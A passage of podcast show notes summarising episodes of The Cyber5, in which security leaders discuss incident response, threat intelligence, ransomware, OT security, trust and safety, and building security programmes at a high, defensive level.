In episode 57 of The Cyber5, we are joined by Colby Clark, Director for Cyber Threat Management. He's also the author of the recently published book, The Cyber Security Incident Management Master's Guide. We baseline incident response playbooks around customer environment, threat, landscape, regulatory environment, and security controls. Afterward, we discuss how incident response (IR) playbooks have evolved in the last five years and they have scaled in the cloud. We discuss telemetry that is critical to ensure an IR team can say with confidence that an incident is accurate, complete and truthful in order to avoid breaches. Lastly, we discuss the criticality of threat intelligence in the IR process and what boards really care about during an incident. Four Topics Covered in this Episode: The Shift in Incident Response Playbooks Playbooks used to be contact lists, and an outline of roles and responsibilities of who to call during a cybersecurity incident. It was typically based on recovery from natural disasters. Today, threat -based playbooks are more specific and actionable tailored to the enterprise environments that were based on compliance and insurance requirements. In Clark's book, in his execution with clients, 13 distinct domains are relevant for baselining these playbooks; including customer environment, threat landscape, regulatory environment, and security controls. Most importantly, incident management is a repeatable process over a period time that adapts to regulators. Enterprise solution tooling is always behind the tooling of the attackers, and therefore, gap analysis within IR playbooks is a constant job for any IR team. The Need for Consolidating Cybersecurity Solution Tools Security practitioners sometimes struggle with knowing the business functionality of applications and systems within enterprise networks, which makes identifying what is normal or malicious challenging. If security technology is not tuned with consideration for the people and process involved, the tooling is useless. Network encryption pervasiveness is making network traffic analysis tools increasingly irrelevant; all important telemetry, to reduce visibility gaps, is moving to the endpoint (devices, servers). Realizing big companies cannot have endpoint detection and response agents (EDR solutions) on every endpoint, means some network traffic capture is still important to track. Incident Response Migration and Evolution to the Cloud Tooling: In 2014, EDR tools started to be developed that took over anti-virus software and since then has detected 80% of breaches. EDR, and now XDR (Extended Detection and Response), solutions that operate in the cloud (AWS, GCP, Azure) are the only means to quickly detect and recover from cyber incidents, especially with a distributed workforce. Protecting Environment: Customer applications that run on cloud servers (production and non-production) bring tremendous frustration for incident response efforts. They do not have on-par visibility to their physical counterparts, particularly with containers. They have reduced controls and limited investigative capabilities, allowing malicious backdoors into environments. Important Strategies: First, maintain, update, and patch baseline images for containers. Second, turn on logging; nothing is logged in cloud environments by default. Companies have to pay extra money to turn on logging and pay additional licensing fees for security tools (cloud trail logging for AWS, for example). Third, turn on network decryption at the right points. Last, keep maintenance of EDR tooling. The Importance of Threat Intelligence in Cloud Security Threat intelligence should be built into EDR logging by default and will likely be part of the XDR paradigm in the future. A deep dive RFI (request for information) capability must also be included to ascertain if the intelligence is directly relevant to the organization or just an industry trend.
In episode 56 of The Cyber5, we are joined by Ray O'Hara, Executive Vice President for Allied Universal. We discuss the use of intelligence for corporate security programs, usually overseen by a Chief Security Officer (CSO). We talk about some of the challenges this role faces and how intelligence can be actionable to mitigate those risks. We also work through various case studies, talk about metrics for success, and what technology platforms are used to aggregate intelligence that might be useful in the future. Four Topics Covered in this Episode: Role Shift for Chief Security Officers (CSO) For many large organizations, the chief security officer is the chief strategist for organizing the holistic security strategy and obtaining board approval for the organization. CSOs are no longer in the day-to-day planning around “guns, guard, and gates.” Instead, they are more strategically focused on business continuity, emergency planning, and crisis management. Risk to business leaders drives the daily activities of CSOs. They need to understand that other business leaders may choose to work around the threat to execute against profit and loss. Intelligence Sources for Chief Security Officers Having a dedicated intelligence analyst is an important asset to a chief security officer. Emerging markets, information on key suppliers, as well as competitor data is routine tasking for an intel analysis who is subordinate to the CSO. Since security is a necessary cost center on the administrative function within organizations, intelligence analysts need trusted partners to handle the collection and analysis side of intelligence, including social media. Additionally, intelligence analysts ensure that collection and analysis are tailored to business management requirements. Sentiment Analysis Combines CISO and CSO Functions Negative sentiment analysis against a company's brand traditionally falls within the CSO's GSOC function. However, this responsibility is starting to move toward information security due to threats to confidentiality, integrity, plus the needs for availability of data, systems, and networks from the Dark Web. As long as coordination is present, it doesn't matter whose lane covers social media sentiment analysis. Social Media Monitoring Critical For Reducing Executive Protection Resources Executive protection is expensive when a physical security threat escalates. Effective social media monitoring and direct threat actor engagement help to derive the most accurate protective intelligence. They can be a more cost-effective way to monitor the danger without having 24x7 surveillance.
In episode 55 of The Cyber5, we are joined by Nate Singleton, a security practitioner who was most recently the Director of IT, Governance, and Incident Response at Helmerich and Payne. We discussed the conundrums of operational technology security within gas and energy sectors, including risks downstream and upstream. We also compared the aggressive and constant need for interconnectivity on the information operation technology sides of the house to show that events like the Colonial Pipeline ransomware attack are probably just the beginning of future attacks against critical infrastructure. We also discussed what more major oil and gas companies can do to help improve cybersecurity for small companies critical in the oil and gas supply chain. Five Topics Covered in this Episode: Operational Technology is Built to Last, Bringing Nuance to Security Underlying technology controlling oil, gas, and energy PLCs runs on old Linux and Windows servers from 20 years ago and patching for upgrades is expensive and takes a lot of down time. Routine vulnerability scanning against an entire IP block often seen within regular IT environments can cause major damage, even resulting in the loss of human life, if not conducted carefully and properly in OT environments. Interconnectivity Comparisons Between Legacy Silicon Valley Tech and Operational Tech Development Security takes a back seat in operational technology for the Energy Industry, just like it does for Silicon Valley product development. The bigger challenge is often integrating regular IT and application developments that need constant upgrades with OT technology that can't take the upgrades on time. A “move fast and break things” mentality in OT could get someone killed. Ransomware and other malware events have the capacity to take down OT production lines for weeks, costing millions of dollars. While the Colonial Pipeline ransomware event only attacked the IT environment, it did not attack the OT environment, thus demonstrating the potential for future calamities to occur. Attacks Against Oil and Gas are Geopolitical in Nature and Will Likely Get Worse Attacks against critical infrastructure are going to get worse and the attacks are often conducted by nation states who have the time to build exploits against the IT environment and are also leveraging sophisticated OT technology. Strategies for Protecting Operational Technology in ONG OT security is protecting the IT administrator who can access oil rigs, energy systems, and OT devices. Reporting must make it from the OT systems to the corporate IT systems so they can see profit and loss. Therefore, many critical infrastructures use the Purdue Model to segment different layers in network infrastructure from the machinery to different levels in the corporate environment so customers can be billed. More granular strategies include: Updated EDR products in the corporate environment Multi-factor authentication separating corporate and OT environments Separate domains for engineers' ability to browse the internet and check email and upgrade software on the OT networks Robust firewall policies on the network layer controlling port protocol connectivity back and forth Threat Intelligence for OT Security Integrating Indicators of Compromise (IOCs) into a SIEM has become an antiquated practice, but they are still valuable for OT environments since they are modeled around constant connectivity and up times. Client-specific intelligence of what threat actors are doing is most critical because the remediations will take place over weeks and months. A cost-benefit analysis is always going to be levied when allocating resources to fix vulnerabilities. A “block all” approach to threat intelligence is not going to work.
In episode 54 of The Cyber5, we are joined by Aaron Barr, Piiq Media's Chief Technology Officer. We discuss how data breaches are combined with other open source information to paint a more holistic target profile for bad actors. We also discussed the true information anchors and weaponization that can lead to an online attack against someone. Finally, we discussed what executives and individuals can do to protect themselves and how protective intelligence is playing a greater role in physical security. Four Topics Covered in this Episode: Common Information Anchors Used to Attack Someone Online Connection to an organization indicating that someone is likely a high net-worth individual. Communication platform for content delivery including, email address, social media platform, phone number, etc. Context for authenticity. The social engineering approach must have the right information about an individual for increased success. Best Practices for Staying Safe on the Internet Keep social media postings about personal information, locations, jobs, education as simple as possible. Be careful not to post pictures with background details that give your location or family profile to potential attackers. Ensure profile pictures are minimal as those are public regardless if everything else is private. Password managers should be used for personal accounts. People should have at least three personal email addresses. Email addresses should be siloed: a) social media accounts b) bank accounts or personal information c) thrown away for rewards, e-commerce, and gifts. Education and Awareness Training Still Important Education to executives and the workforce about simple technology such as the ability to flag suspicious emails that get escalated to the security team still goes a long way in securing the workforce.
In episode 53 of The Cyber5, we are joined by Ciaran Martin, the former United Kingdom National Cybersecurity Center CEO and former Director General for Cybersecurity of GCHQ. He's currently a professor at the University of Oxford and a strategic advisor for Paladin Capital. We discuss the political, legal, and ethical challenges of today's ransomware threats and the corresponding nation state challenges of Russia, China, and Iran. We also discuss what the U.S. and global economies can do to reduce these threats and how the financial industry can assist in a greater capacity. Four Topics Covered in this Episode: Ransomware's Social Impact Escalates to National Security Priority With semi-conductor shortages caused by the pandemic and corresponding geopolitical rifts between the U.S., Russia, and China, ransomware is at the center of national security threats While ransomware actors are just organized criminals, three characteristics have made this a broader national security threat: Russia and surrounding states allow criminality to flourish. Cybersecurity problems exist in western economies due to vulnerabilities caused by poor security practices within development lifecycles. Ransomware business models position criminals for success. Executives don't understand cybersecurity and immediate business impact motivates them to pay ransom. China Wants Authoritarian Control over Technology; Russia Wants a New Cold War The U.S. and Western model of technology has created flaws that lead to ransomware. The “move fast and break things” mantra of Silicon Valley prioritizes connectivity over security. The Chinese model is one of consistent integration, overwatch, authority, and frugality. Russia seeks regional control and the overall weakening of democracies through disinformation and offensive computer network exploitation operations. Commonalities and Differences of Combating Ransomware Actors and Other Non-State Actors Key Differences: Ransomware actors are not yet causing widespread harm to individuals. If this starts to occur, we could see increased offensive campaigns against ransomware actors similar to what we've seen against other non-state actors. Non-state actors of the last 15 years were usually under a failed state whereas ransomware actors enjoy state protection in many cases. Key Commonalities: The world economies will eventually join to stop the movement of money that is used by ransomware actors, repeating what happened to the non-state actors of the last 15 years. The Financial Sector Must Step Up to Stop Ransomware Cybersecurity risk is well understood by the major financial sectors as it pertains to their own security. Cybersecurity, fraud, insider theft, and general resilience are well understood and defended by the major banks. Aspects of cryptocurrency and money laundering aspects of cyber security are still major opportunities for the FIs.
In episode 52 of The Cyber5, we are joined by Nisos Managing and Technical Principals Robert Volkert and Travis Peska who lead operations within the Pandion Intelligence team. We talk about the evolution of Nisos over the past six years, including how we now position ourselves within the private sector threat intelligence market under our new Chief Executive Officer, David Etue. Our managed intelligence mission combines open-source intelligence analysis, technical cyber security investigative tradecraft, and data engineering to solve enterprise threats around cyber security, trust and safety platforms, reputation, fraud, third party risk, and executive protection. We reminisce about our favorite investigations and talk about what's next for Nisos. Three Topics Covered in this Episode: How Nisos Has Evolved In the last six years, Nisos evolved its mission to focus on being the Managed Intelligence Company™. Using skill sets combining offensive operators, forensic and network analysts, open source intelligence experts, and data engineers, we collect and analyze data to solve problems within six primary intelligence domains: Cyber Threat Intelligence Protective Intelligence Reputation Intelligence Platform Intelligence Fraud Intelligence Third Party Intelligence Providing the Answers, Not Just Data in Monitoring and RFI Services Since our “outside of the firewall” investigations and tradecraft over the years, we realized customizing smaller datasets around customer problems is more helpful to customers and helps differentiate our offering with actionable intelligence with appropriate context. Aggregating data to a product that doesn't provide the answers is often a waste of resources for many organizations who need to make information actionable to security operations teams and executives. As part of these services, routine monitoring services followed by an aggressive RFI service is generally viewed as the most effective way to quickly answer customer intelligence requirements within a 24-48 hour period. Favorite Investigations Over the Last Six Years While the most prolific investigations have involved the unmasking of threat actors when the appropriate context is needed, the most well known investigations generally involve attributing attacker infrastructure and unraveling different malicious tool sets against platform technology companies and business applications.
In episode 51 of The Cyber5, we are joined by Chris Castaldo. Chris is the Chief Information Security Officer for CrossBeam and has been CISO for a number of emerging technology companies. In this episode, we talk about his newly released book, “Startup Secure” and how different growth companies can implement security at different funding stages. He also talks about the reasons security professionals should want to be a start-up CISO at a growing technology company and how success can be defined as a first time CISO. We also talk about how start up companies can avoid ransomware events in a landscape that is not only constantly changing but also gives little advantage for defenders of small and medium sized enterprises. Two Topics Covered in this Episode: 4 Security Lessons for Founders of Start-up Technology Companies When a B2B company is pre-seed or before Series A funding, customers might have leeway for lax cybersecurity controls. However, after an A round, policies, certifications (SOC2 or ISO27001), procedures will be required to ensure customer data is staying safe. A B2C technology company might not be asked by the public for certifications, but auditors and regulators may. Basic policies include: Single Sign-On or an Okta authentication into applications, cloud, and workstations Password management implementation (LassPass or OnePassword) Encryption at rest and transit Vulnerability scanning Combating Ransomware from The Inside-Out Approach and Integrating Threat Intelligence Blocking and tackling from inside-out to get in front of ransomware is challenging. The simple items to tackle are the following: Auto-updates for patch management on operating systems Endpoint Detection and Response products Proper asset management to have full visibility on all network devices and services At the point when resilience and compliance controls are in place and an organization can bounce back from an incident in a timely manner, adversary insights via threat intelligence is a logical next step.
In episode 50 of The Cyber5, we are joined by Paul Kurtz. Paul's career includes serving as Director of Counter-Terrorism, Senior Director for Cyber Security, and Special Assistant to the President of the United States for Critical Infrastructure Protection. He was previously the CEO of Threat Intelligence Platform TrueStar and is now the Chief Cybersecurity Advisor, Public Sector at Splunk. In this episode, we discuss the Biden Administration's executive order for cybersecurity and how it impacts the public and private sector in relation to intelligence management. We also talk about an inside-out network approach and the criticality of cloud migration in detecting cyber threats at scale. We further discuss the value of threat intelligence and the importance of integration with enterprise systems. 6 Topics Covered in this Episode: Three Key Points of the Executive Order: While important topics such as zero trust identity access management and third party risk management get the major attention, three important, but often overlooked, points covered in the executive order are: Cloud Transition Information Sharing Data Collection and Preservation From an intelligence management and security perspective, the migration of the US public sector to the cloud, coupled with information sharing and data preservation are the most important actions to reduce mean time to detect and alert, mean time to respond, and mean time to remediate. Need for Automation of Internal and External Telemetry Endpoint Detection and Response, next generation anti-virus, next generation firewalls, and IAM (identity and access management) are examples of the advancement in enterprise security solutions. These technologies are now being augmented by threat intelligence solutions. Integrating and automating this suite of advanced capabilities is key to optimizing intelligence and defending against increasingly sophisticated threat actors. MSSP are Critical to Protecting SMBs MSSPs must integratie their alerting and detection ability to the cloud in order to protect small and medium sized businesses. Small and medium sized businesses don't typically have the security teams or expertise to patch, remediate, and threat hunt. MSSPs with MDR capability can effectively serve this market. Threat Intelligence Must Be Integrated to Augment Existing Telemetry Threat intelligence must be actionable. A key action to achieving actionability is the integration into an internet ticketing system, a Security Event Management Tool (SIEM), a Threat Intelligence Platform, or an Endpoint Detection and Response solution. Behavior is King for Appropriate Context The ability to detect malicious behavior from actors inside a network and initiate an appropriate response. This is not possible without the context provided by cloud integration, log aggregation, a retrospective “look back” capability, and the integration of external data and internal telemetry. US Civilian Agencies Need a Roadmap for Cloud Integration If the Central Intelligence Agency can embrace the cloud, so can other agencies. A federal roadmap is urgently needed to defend against attacks by sophisticated adversaries.
In episode 49 of The Cyber5, we are joined by Cassio Goldschmidt. Cassio is Senior Director and Chief Information Security Officer at ServiceTitan. We discuss building a security company in late stage tech startups, including what to prioritize when starting a security program. While tech startups have a mantra of “move fast and break things,” Cassio talks about how a security program should enable business and adapt to the culture. He also discussed the pitfalls to avoid when starting a program like this. 4 Topics Covered in this Episode: Reasons a Business Starts a Security Program: It's critical to understand why a technology company is hiring it's first Chief Information Security Officer. Typically it's for one of four reasons: Compliance: If a company is in a highly regulated industry, a stronger security program is mandatory. Reputation: Security products, for example, need to have the reputation of safety being core to their business model. Breach: Some companies have a breach and the board mandates a stronger security program. Customer Demand and Losing Business: Competitors use stronger security programs as a business differentiator and oftentimes a security program gives consumers or clients peace of mind that their data is safe. First Initial Priorities of Security Program The growth of the company is important to understand when starting a security program because security professionals need to think about the future of the company tomorrow, not today. New security programs are the “guardians” to secure initiatives, not the “gates.” Key tactical aspects of a security program are: Assess Risk: Perform a risk assessment to baseline maturity as it stands today. Map out the challenges to fix items that are critical to the business with the understanding the business cannot stop for security initiatives. Listen: Engage different parts in the business (sales, marketing, engineering, etc). Educate: Build a good educational program to train the workforce. Common Pitfalls to Avoid for Initial Security Programs Common pitfalls a CISO is likely to face when starting a security program include: Misconfigurations Poor patch management Abuse problems (spam) Not centralizing spear phishing emails No education towards the workforce on security Credentials are used in the wild Weak password policies Poor onboarding/offboarding policies allowing old accounts to remain active and exposed to the internet Prioritizing against problems of nation state lateral movement or zero day vulnerabilities when smaller issues can be solved first Enabling Business: “Move Fast But Don't Break Things” For setting up security programs, security professionals should adopt the mantra of “move fast but don't break things”. They need to implement their program and remediations, but they must keep constant availability as one of the highest priorities. Other items like red team (penetration testing), blue team (threat hunting), and threat intelligence should be out-sourced initially after the initial remediations from a risk assessment are complete. Security professionals should use department budget money like it is their own personal money, not the company's money. Understanding what the technologies will do for the program and having a way to show success metrics are important to justifying the spend. Dynamic application analyst tools are important for technology companies as these ideally protect the main business technology applications.
Topic: Using Intelligence Analysis in InfoSec: Think Globally and Act Locally In episode 48 of The Cyber5, we are joined by Rick Doten. Rick is VP of Information Security at Centene Corporation and consults as CISO for Carolina Complete Health. We discuss shifting the operating model of threat hunting and intelligence to a more collaborative model, “think globally and act locally.” We then dive deep into the intelligence analysis for collecting and analyzing the vast array of network data to prioritize network protection. Finally, Rick makes an argument for the outsourcing of an intelligence function as a viable model. 5 Topics Covered in this Episode: Security Operations Integrating with Cloud, Applications, and Mobile: (01:00 - 06:00) Security operations involve integration with key elements of the business such as the cloud, applications, and mobile team. Risks to a container are much different from a server and force security operations to integrate with many teams, especially in large enterprises. This will guide how we protect proactively with alerting and reactively with incident response. Using Intelligence Analysis with Information Security Data Collection (06:00 - 08:52) Intelligence includes tracking specific campaigns of threat actors, their intentions, and capabilities. Intelligence analysis in the disciplines of information security is linking the human to the malicious act. For example, suppose a criminal threat actor uses email phishing and credential harvesting. In that case, the data collection model and instrumentation will be different than looking at actors who use exposed RDP or take advantage of supply chain risks. It will also be very different from a nation-state actor who is known to go “low and slow” and persist in 10 different places in a network. Value of Attribution and Communicating to the Board of Directors: (08:52 - 13:26) The mindset of keeping confidentiality, integrity, and availability of information safe and not wanting to attribute the threat actors and building appropriate threat models is becoming more antiquated. Understanding the human who perpetrated the act is critical. Their job is to break into a network and collect and/or monetize. This used to be easier in the defense industrial base because there are cleared environments for information sharing; however, this is becoming more efficient with Information Sharing Analysis Centers (ISACs). Boards of Directors understand competitors stealing intellectual property, so framing cyber threats in the same vein is the most productive way to get them to understand the importance of nation-state espionage or cyber criminals. The Right Way to Do Threat Intelligence: Think Globally Act Locally (13:26-24:00) The most important threat intelligence is internal network telemetry. The wrong mentality is to buy threat intelligence feeds and load indicators of compromise (IOCs) into a security tool like a SIEM. This will result in tremendous workloads with little results as good actors change their signatures constantly. Instead, it's important to get timely, actionable, and relevant finished intelligence on actors and their campaigns, not data or information. Finished intelligence might be reviewing technical methodologies of Russian GRU (or REvil ransomware) actors and identifying behaviors that can be detected internally on the network. At the highest level of attack campaigns are assignments of individuals to attack one particular company and steal/monetize something very specific. After gaining this intelligence, a security team can “dogpile” with the different entities of the business (SOC, applications, IT, development, mobile, etc.) to hunt and defend, “think globally, act locally.” Threat intelligence could certainly be outsourced, especially for companies who do not belong in an industry with ISACs. The Hardest Part of Intelligence Analysis: Determining Targeted Attack Versus Commodity (24:00-31:00) The hardest part of intelligence is being able to quickly identify if the attack is targeted or commodity. An actor who persists on Active Directory and the domain controllers is much different from those who want to exploit a bug in a cloud application or mobile application. Security teams who have minimal visibility gaps with internal network telemetry that can quickly detect these differences separate the mature security teams from the less mature security teams.
In episode 47 of The Cyber5, we are joined by Lena Smart. Lena is the Chief Information Security Officer at MongoDB. We discuss how security can be an enabler of a business during fast periods of growth. We review how different departments can set up their own applications without needing an arduous approval process. We also discuss different cultures in departments and best practices for assessing vendor risk. 4 Topics Covered in this Episode: Avoiding Shadow IT and Enabling the Business: (01:47 - 06:00) In big organizations, “shadow IT” refers to information technology systems deployed by departments other than the central IT department. Individuals add these technologies to work around the shortcomings or limitations of the central information systems. Oftentimes IT security is not aware of the implementation of these systems until vulnerabilities are exploited and security is called to investigate the incident or breach. Security can enable the business through education and automation of processes. Communication is key to success. We recommend regular meetings with legal, human resources, technology, engineering, sales, and marketing. A “security champions program” is also helpful because it brings together those who are interested in security to show transparency of the risks security faces: incidents, vulnerabilities, patch management cycles, etc. Transparency of Reporting Incidents Back to Stakeholders (06:00 - 08:37) Great security programs start with the CEO and board of a company. If they recognize these issues as existential threats to the business, it's easier to gain insights and selective transparency, as needed. While a “see something, say something” approach is highly advised, it's more important to have a feedback cycle so closure is brought to the employees outside of security who report incidents. Security acting in a “black box” where information comes in and nothing gets returned is not going to keep employees reporting the issues that matter. Security Adapting to Cultures of Departments: (08:37 - 12:31) Security teams cannot be seen as the “people that say no”. Security teams cannot live with a reputation of fostering fear, uncertainty, and doubt (FUD) within the business. Bringing people that are interested in security together for two hours a week for events like capture the flag, security book club, and table top exercises helps increase awareness and gives tangible results in the business buying into security programs including reducing shadow IT. Critical Elements of Third Party Risk Management (12:31-17:00) Performing security checks when new vendors onboard and going beyond questionnaires is critical now more than ever following SolarWinds. A particular focus should be to categorize the high-risk vendors that could be used to be a pivot point for gaining access to your organization. Lena recommends the use of subject matter experts to map out connections from high-risk vendors and have an investigations mindset and not just a compliance box checking exercise. This is likely a year-long effort and not a one-month level of effort. The results of such a deep dive should be to have a process of engaging with critical vendors when a supply chain attack occurs rather than considering terminating the relationship.
In episode 46 of The Cyber5, we are joined by Charlotte Willner. Charlotte is the Executive Director of the Trust and Safety Professional Association. We will define what trust and safety means within organizations and how it differs from traditional cyber and physical security. We'll focus on fraud and abuse of user-generated content on platforms and marketplaces of technology companies. Finally, we'll discuss how security professionals can grow a career in trust and safety. 5 Topics Covered in this Episode: Defining Trust and Safety: (02:20 - 04:30) Trust and safety emerged from different disciplines within technology companies, including security and customer support. The security teams focused on how people were using the platforms for fraud or illicit financial gain. Customer support dealt with abuse by the users and the posting of inappropriate content (e.g., illegal narcotics or child sex exploitation). In the last 15-20 years, these two disciplines have converged to form the core of the trust and safety mission. The Differences Between Fraud and Consumer User-Generated Content Abuse such as Disinformation (04:30 - 09:17) Fraud and abuse of user-generated content overlap considerably with trust and safety teams. Bad actors routinely use technology platforms to defraud individual users, especially within online marketplaces that deal with real-world spaces and objects. For example, Airbnb could combat fraud where an individual bad actor misrepresents listings and tries to take them off-platform to engage an individual to steal money from them. There could also be a scenario where that engagement is taken off-platform, and more violent criminal acts occur such as assault, physical theft, or carjackings. User-generated content and fraud schemes also deal with the nature of truth. Someone impersonating a US military member asking for help and money is a pretty common user-generated scheme within platforms. When trust and safety teams have to pivot into addressing user-generated content that deals with disinformation, misinformation, and even equality issues, teams have to be adaptive to dealing with an appropriate response that is fair and right to all. Addressing Risk Mitigation and Incident Response in Trust and Safety: (09:17 - 15:30) When the barrier to entry is minimal or non-existent (platforms are free to use), trust and safety teams deal with thousands of problems a day, and prioritization is critical. Compared to other industries (finance, retail, manufacturing), the principles are the same: 1) Evaluate the quality of inputs, meaning evaluate the sources and access, and 2) Align with business principles and corporate values. These principles have become more focused due to the nature of moderating content that is equitable for all socioeconomic and political classes. Metrics for Trust and Safety (15:30-17:00) Prevalence metrics are the gold standard in trust and safety. Once a threat is identified, building automations to find out how much of that threat is on the platform and could affect the platform is important. The caveat is if you can't find the exact numbers of threatening events, you can approximate with simple search functions to drive a program and mitigations. Building a career in Trust and Safety (17:00-21:00) The same principles of intelligence analysis are important for trust and safety. A sense of curiosity, integrity, and adaptability are critical skill sets as no day and problems will be the same. Entry-level positions are often content moderators who elevate through fraud or customer support and eventually rise into more senior positions that deal directly with threat actors to make them stop, including working with law enforcement. Specialized investigations, tool development, or a leader in trust and safety are often the professional development path.
In episode 45 of The Cyber5, we are joined by John Grim. John is the head of research, development, and innovation for Verizon's Threat Research Advisory Center. In this episode, we discuss the differences between threat actors who engage in cybercrime and those who are nation state espionage actors. We explore their motivations around computer network exploitation and how threat models on these actors need to adapt to enterprise security and IT. 5 Topics Covered in this Episode: 1. Motivations of Cyber Crime versus Espionage Actors: (01:30 - 08:00) According to a study conducted by Verizon in late 2020, over a seven year period, financially motivated threat actors were responsible for 76% of breaches, whereas espionage actors were responsible for 18% of breaches. PCI attacks, business email compromise, and fraud (such as COVID-19 scams) were more prevalent than advanced attacks. Of those 18% of breaches perpetrated by espionage actors, 57% of the time, manufacturing, mining, utilities, and the public sector were the largest industries dealing with espionage threat actors. However, financial, insurance, retail, and healthcare are mostly targeted by financial organized crime actors. The vectors most used by either organization (nation state or crime) were social engineering attacks through phishing and credential thefts, as well as backdoor access through applications. A big difference, however, is that in most espionage cases, native Windows command techniques such as “living on the land” (LOL) were used to avoid being detected in log entries. These are pre-installed system tools to spread malware. 2. Defending Against Cyber Crime and Espionage for the CISO: Understanding Environment and Threat Modeling (08:00 - 12:16) The number one discovery method for breaches, according to Verizon, was investigating suspicious traffic. A two part, multi-step strategy should be implemented to protect crown jewels and alert on suspicious traffic. The first is understanding your own environment: Step 1) Identify critical data and the assets that hold that data and Step 2) Ensure network devices are configured and patched properly and Step 3) Restrict access. Defenders need to understand and have the proper tooling that flags anomalies in suspicious traffic especially when so much of it could be native Windows commands in the environment (LOL). The second part of this strategy is conducting threat modeling against the threat actors that are likely to attack your environment and leverage intelligence sources to build proper defenses and controls. 3. Evolution of Threat Intelligence Driving Investigations: (12:16 - 15:30) In the last five years, threat intel has evolved: In the early days of threat intelligence, forensic artifacts (known as indicators of compromise) were shared to tip off network defenders of known signatures of an attacker present in an organization's environment. Tactics, techniques, and procedures outside of an organization's environment being actively shared to give context on the modus operandi of the attackers. Dark web and open source threat hunters going outside the wire to gather information that could be used in a breach. Intel effectively drives the investigation that prevents an incident from becoming a breach. 4. Threat Models Differ from Cyber Crime and Espionage But They are Similar: (18:47 - 21:00) In espionage attacks, desktops, laptops, and mobile phones are the assets that are targeted most often. For financially motivated attackers, the assets targeted vary tremendously including web applications servers, customers, customer devices, and employee devices previously mentioned. To compromise the integrity of data systems, targeting software installation (such as Solarwinds third party) was the number one attribute of financial and espionage actors. Secure configurations of software, hardware, applications, and network devices are the most important remediation efforts. 5. Embracing Business Terms Important to CEOs and Executive Leaders: (21:00 - 26:00) Security leaders need to write reports and convey technical findings in terms of risk to the business to generate revenue. While data breaches have become more complex over the years, they are more complex to the stakeholders outside of security and IT, particularly HR, legal, and Finance. Breaking down technical findings and capabilities to various threat actors to make sense to different levels of the business is the biggest adjustment needed to the security industry.
In episode 44 of The Cyber5, we are joined by Ronald Eddings. Ron is a Security Engineer and Architect for Marqeta, host of Hack Valley Studio podcast, and a cybersecurity expert and blogger have earned him a reputation as a trusted industry leader. In this episode, we discuss the fundamentals of automating threat intelligence. We focus on the automation and analysis of forensic artifacts such as indicators of compromise and actual attacker behaviors within an environment. We also discuss metrics that matter when the objective is to show progress for a security engineering program. 5 Topics Covered in this Episode: Define the Use Cases: (01:19 - 04:17) For a mature security team, the automation of cyber threat intelligence should start with defining use cases. An enterprise should ask, “What problems am I trying to solve?” Detecting malicious binaries on devices is a good place. For example, let's start with a problem that plagues all organizations: phishing. Creating an inbox for phishing emails is a good first step. Then, an organization needs to make a decision whether to automate the extraction of file hashes, URLs, and IPs for analysis or to direct employees not to click on the link or open the file. Storage and Logging Components that Need to be In Place: (04:17 - 06:59) For security engineering to be effective, data must be available. Security engineers should define a data acquisition strategy by eliciting stakeholder requirements and assessing your collection plan. The right data is often spread across multiple tools and systems. This must be consolidated into one location for automation to be effective. For example, if an organization wants to detect lateral movement from an Advanced Persistent Threat and is only storing a month of Windows event logs, success is unlikely. To be effective, the following logging should be in place: 1) Windows event logs 2) Netflow (which can be expensive) 3) Cloud logs 4) EDR logs from endpoint devices, and 5) VPN and RDP logs. Prioritizing MITRE ATT&CK in Security Engineering: (06:59 - 10:12) When beginning a program, security engineering should resist the temptation to automate APT groups. Instead, they should automate alerts in the reconnaissance stages within MITRE ATT&CK and then work down the cyber kill chain towards exfiltration. Reconnaissance stages are easier to automate and by the time an attack escalates to the lateral movement stage, automation will facilitate and speed human analysis. Security Orchestration and Automated Response (SOAR): (10:12 - 12:00) Python and Go are helpful languages to learn in the SOAR process and useful with incident response. Useful Metrics and What Cannot be Automated in Security Engineering: (12:00 - 19:00) Mean time to detection, response, and remediation are critical metrics for security engineers to measure. Case management systems such as JIRA can facilitate interaction between the security team roles, including SOC, Incident Response, Security Engineering, Threat Hunt, Threat Intel, Vulnerability Management, Application Security, Business Units, and Red Team. Identifying new threats and understanding why a threat occurred is almost impossible to automate and will always require analysis.
In episode 43 of The Cyber5, we are joined by Steve Brown, Director of Cyber & Intelligence Solutions for Europe at Mastercard. Steve discusses the key aspects of cyber defense learned while working international cyber crime investigations with the United Kingdom's National Crime Agency. He will discuss the proven approach of prevent, protect, prepare, and pursue. We will also discuss the role Mastercard is taking in fighting cyber criminals, key aspects of adversary attribution, and how the public and private sector can forge better partnerships to combat cyber crime. 5 Topics Covered in this Episode: 1) Four P Approach: Prevent, Protect, Prepare, and Pursue: (01:59 - 06:08) Cyber criminals are not siloed. They coordinate on what is working and adjust quickly to take advantage of new vulnerabilities. To combat their adaptive approach, enterprises must have an equally collaborative model. Prevent: Mastercard is working with charities, non-profits, research centers, and universities to encourage individuals with technical backgrounds to pursue a career outside of cyber crime. Protect: Providing customers of Mastercard with the right knowledge and intelligence to proactively protect themselves. Prepare: Complementing playbooks with red teaming and resilience for Mastercard and its customers to ensure business continuity when an attack occurs. Pursue: It's not just about arrests; it's about Mastercard providing intelligence on infrastructure takedowns, victim engagement, and witness testimony. 2) Mastercard's Cyber Security Strategy: Pioneering the Security of the Digital Eco-System: (06:08 - 09:57) Mastercard's cybersecurity strategy is about securing the entire digital eco-system, both within and external to the perimeter. They want to be actively involved in the cybersecurity community and prioritize technologies that better define authentication across payment systems, identify anomalies that are congruent to compromised data and fraud, and improve standards and best practices. In November 2020, they launched Mastercard Cyber Secure, a unique AI-based technology that better addresses account data compromise events through identification and notification. In practice, victims are generally notified after initial intrusion. After the alert, cyber criminals use the compromised data to facilitate other crimes, including fraud, human trafficking, and espionage. Using risk assessment technology, Mastercard identifies, assesses, and prioritizes those vulnerabilities to Mastercard acquirers around the world. This is particularly critical for the small business community. 3. Mastercard's Role in Third Party Risk Management: (09:57 - 11:43) A critical part of securing the external perimeter is understanding third party suppliers. Mastercard's acquisition of RiskRecon is a testament to their dedication and diligence around third party vulnerabilities. 4. Know Your Adversary: Attribution is an Aspect of Resilience: (11:43 - 20:45) Attribution must be a critical part of enterprise cybersecurity strategy. Proper attribution can be a major source of resilience when responding to a cyber attack. Understanding infrastructure, personalities, actor groups, and TTPs informs proper controls and response strategy. Data collected by enterprises is critical to fighting cyber crime, and enterprises must facilitate ways to legally process and share data and experiences. Enterprises must rely on gaining information and attribution on cyber crime and espionage efforts without the assistance of government organizations. Illustrating the ability to scale security operations and recover from a cyber attack is of critical concern to boards, investors, and shareholders. 5) Private Sector's Increasing Role in Preventing Cyber Crime: (20:45 - 26:00) The private sector must increase 